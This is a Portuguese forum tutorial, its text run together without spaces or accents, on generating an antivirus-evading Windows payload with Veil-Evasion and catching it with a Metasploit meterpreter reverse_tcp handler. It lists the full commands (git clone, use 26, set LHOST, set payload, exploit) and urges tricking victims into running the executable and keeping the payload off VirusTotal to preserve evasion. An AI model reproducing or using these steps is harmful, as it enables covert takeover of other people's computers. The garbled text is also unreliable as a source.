Você está na página 1de 11

Aprimeiracoisaoquemuitosrioevitemrodarosexploitsnovirustotalpoiselesficamcapturandoassinaturas

doscdigosdosmesmosereconhecendoestescomovrusemalwaresoquetornafuturasexploraesmais
difceisesevocjatemalgumadificuldadeemtaistarefasestassaumentaramnasuavtentativadeverificarse
atcnicafunciona.
Existemuitacoisadesteassuntonasurface,posteiaquipratentarcolaborarcomofrum,novouaquiexplicar
comoinstalarasferramentasnecessriasparaestainvasosimples,porquevocpodeencontrarfacilmenteem
outroslugarespelasurfacebusqueporkalilinux,metasploit,bypassantivirus.bemimprovvelquealgumque
chegouataquinoencontrelinksparaasferramentasmas,deixareioslinksparatodasasferramentasusadas
aqui.Aconselhodevidamentequeutilizemokalilinuxporumaquestodefacilidadeepraticidadetendoemvista
quepraticamentetudojveminstaladoeconfigurado,bemchegadeblablablavamosaoqueinteressa.

Ferramentasutilizadas.
Nestasituaouseiokalilinuxemsuaultimaversodisponivel.
OframeworkSET(Quejaveminstaldonadistribuioemquesto)
VeilFramework
Depoisdetudoinstaladoseriainteressanteatualizarosistemaeometaesploitporumaquestodesemanterem
diascomascorreesdebugseadiesdeferrametas.
BomcomooVeilFrameworknomuitousualvoudaraquiumaexplicaorpidasobresuainstalaoeutilizao

DescrioBreve

OVeilframeworkumaformamenosconhecidadegerarexploitstendoemvistaqueoexploitsdometasploitso
velhosconhecidosdosantivirus,oveiltemumaboagamadeexploitsemvriaslinguagenssejambonsfuadorese
verifiquemporvocsmesmo.
Instalao

Aprimeiracoisaescolherapastaondeirainstalaroveilquepodeserqualquerpastanoseusistema,aconselhoa
pasta/optporumaquestodepadrodeinstalaodesoftwaresnolinux.

Agoravamosusaraferramentagitparainicializarodiretrioescolhidonocaso/optcomodiretrioparaaferrameta
ogitumaferramentaquecomoosvn,masaquibastasabercomandosbsicosnolembroagoraseogitvem
instaladoporpadronokalilinux,massenoestiversrodarosseguintescomandos:

aptgetupdate
aptgetinstallgit

Depoisdistoparainiciarodiretrioparaogitfaa:
cd/optEntrandonodiretrio

gitinitSetudorodarcertinhoestaraptoainstalaroVeilFrameworknapasta/opt

AgoraentrarbaixareinstalaroVeilframeworkhttps://www.veilframework.com/dumaboafuadatemalgumas
coisasbemlegaisporaserialegalcriarumacontaedarumforknodiretriogitdoveil.Bemvamosaos
comandosparainstalaraferramentaedeixardeconversa.

gitclonehttps://github.com/VeilFramework/Veil.git

Aguardeumpoucoqueogitfarpraticamentetodootrabalhopravoc.)

Nestecasoresolvemosinstalartodooframeworkquefogeumpoucodoescopoexplicartudoaqui,masmelhor
instalartudodeumvezporquedepoisvocvaiquererusaroutrasfuncionalidadesdoveil.

Logoapsterminarodownloadentrenapasataciradadoveildeuseosseguintescomandos:

VerificandoqueestecomandoemespecificoparatodaainstalaodoVeilFramework.

AgoravoctervriaspastasaqueinteressanesteescopoapastaVeilEvasionentrenestapastaeexecuteo
VeilEvasion.py:

EstaatelaincialdoVeilEvasionnelansiremosaquigerarumexploitbsicooscomandossobemintuitivos
vamosdarumlistparaconfirmaroexploitqueiremosusar.


Verificandoalistadeexploitsdisponiveisutilizaremosonumero26paraistovamosrodarocomandouseseguido
donumerodoexploitreferido.

use26

Dificiln,hahahahbomnestepontoeugostariadedeixarumadicasimplesvasculharosexploitsoferecidospelo
VeilEvasionelembrandoqueapossibilidadedeutilizaroscodigosdosexploitsdometasploitouatmesmodo
dpexploitdevidoafacilintegraocomestasferramentasoquetornaoveilumframeworkmuitolegalzinho).

Vemosnaimagemabaixoqueajanelamudoumostrandoopesrequiredparaconfigurarmosaquioexploit

Podemosqueasopessobemsimplesenadademuitosegredonemdetcnicashackertoplevel10seilcomo
sefalasobreisso.Enfimvamosasopes

LHOSTaquivocvaicolocaroseuipparaaconexoreversacomavitima
LPORTaquivoccolocaaportaparaestaconexo

OBS#Aquigostariadedeixarmaisumadica,aporta4444funcionamuitobem,pormmudeestaportaporqueela
podeserfacilmentedetectadaporalgumfirewallouantivirusouidsquefuncionanavitima,nuncademaister
cuidado.Nestecasousareiaportapadroporqueestoucompreguiamesmo.hahahahha

Paraatribuirosvaloresusaremosocomandosetestecomandovocpodeatribuirosvaloresdasopes,existem
outrasopesquepoderiamosmudarmaisnovouexplicaraquitudoporqueestabagaaaquijestamuito
grande.

Entoocomandoficariaassim:

setLHOST192.168.0.105>>>>Claroqueesteipomeuipdaredeinternangente,useaquioseuiponde
rodaometasploit

Depoisdissoporemosverificarseasinformaesforamcarregadascomsucessocomocomandoinfo

Agorapoderemosfinalmentegeraroexploitcomocomandogenerate

Aquioveilpedepravocdigitarumnomeparaseunovoexploitdomalhahahhahaha:)
digitaumnomequalquer

Agoraelepedeparaescolhermosumaformadeexecutaroexploit,quenocasoofdpruimescolhaaopo1as
outrasopesrequisitamcriptdeexecutaveisqueemsuamaioriapegopelosantivirusdavida.

Nestatelavemosqueoexploitfdpruimestanapasta/root/veiloutput/compiled/fdpruim.exe
entovamosaometasploit.
Aquigostariadedeixarumabreveexplicao,estatcnicabaseadaemengenhariasocialentonosejaidiotae
sevireprafazeravitimaexecutaristonocomputador,sevocnoforcapazdistosugiroquereconsideresua
carreiracomoporpostohacker.


NatelaacimavemosumbanerdoMetasploitmantehaistoatualizado.

Semmaioresexplicaesvamosvamossetaroambienteparaescutaraportadoexploitenquantovocbolaum
planodeespionagemdignodomissoimpossvelprafazeravitimarodaristonoseucomputador:)

useosseguintescomandos

useexploit/multi/handler

Depoisdecarregaromoduloemquestovamoscarregaropayloadqueirdefatoexplorarofdpruimecriaruma
seometerpreternavitimaqueseropontodepartidaparaumaexploraomaisdetalhadadosistemaalvo.
Paraistovamossetaropayloadesuasdevidasopes.

setpayloadwindows/meterpreter/reverse_tcp

Vamosverasopesdopayloadparaconfigurarmoscorretamenteparaistouseocomando:

showoptions

VemosqueoLHOSTestaembrancoeoLPORTporpadroestacomaporta4444queporcoincidenciaaporta
dofdpruim,quebomn:)

vamosusarocomandosetnovamenteparasetaroLHOST

setLHOST192.168.0.105

Vamosverificarnovamentecomocomando:
showoptions

agoravamosrodarocomadoparaescutaraofdpruimqueseriaocomandosimples:

exploit

Atelaficarassim:

Agoraeurodooruiwndowsaquinumavboxoquenodevesersegredopraningumvamosexecutaroarquivona
mquinaalvoveroqueacontece.Euestouusandoowidows7premiumeoavastofirewallestaligado!
vejamqueoantivirusnemcomscanerdiretoconsegueencontrarofdpruimcomoumapossivelameaa.

Agoravamosexecutarofdpruimeverseeleruimmesmo:),vamosvercomoometasploitsecomporta!!!

Prontocomopodemosvertemosumasessometerpreternamquinaalvo.

Acreditoquenestepontosejadesnecessriodizerqueapartirdaquipodemosfazerpraticamentetudonoalvo,
apenasrestritospelaspermiesqueonossoexploitconseguiu,tambmquerodeixarclaroqueapesardistoestar
configuradoparamquinaslocaisfacilmetepoderiamosgeraralgoparamquinasnaredeutilizandoouumipreal
ouservioscomonoipistorequerumpoucomaisdetrabalhomascomoaquiapenasumademostraosimples
esperotercontribuidocomalgumacoisa,noproximotutorialvamosvercomoescalonarosprivilgiosdasesso
meterpretereteracessocomoadministradordosistema.Nesteexemplocomocomandogetsysteminternodo
meterpreternoconseguedigamosrootarosistema.

Novoumeestendermaisenofiquemrodandoistonovirustotalporquesevcjachadificilistoaquidepoisqueos
antiviruscomearemapegaristoporcausadateimosiaimbecildevocsficarpiorainda.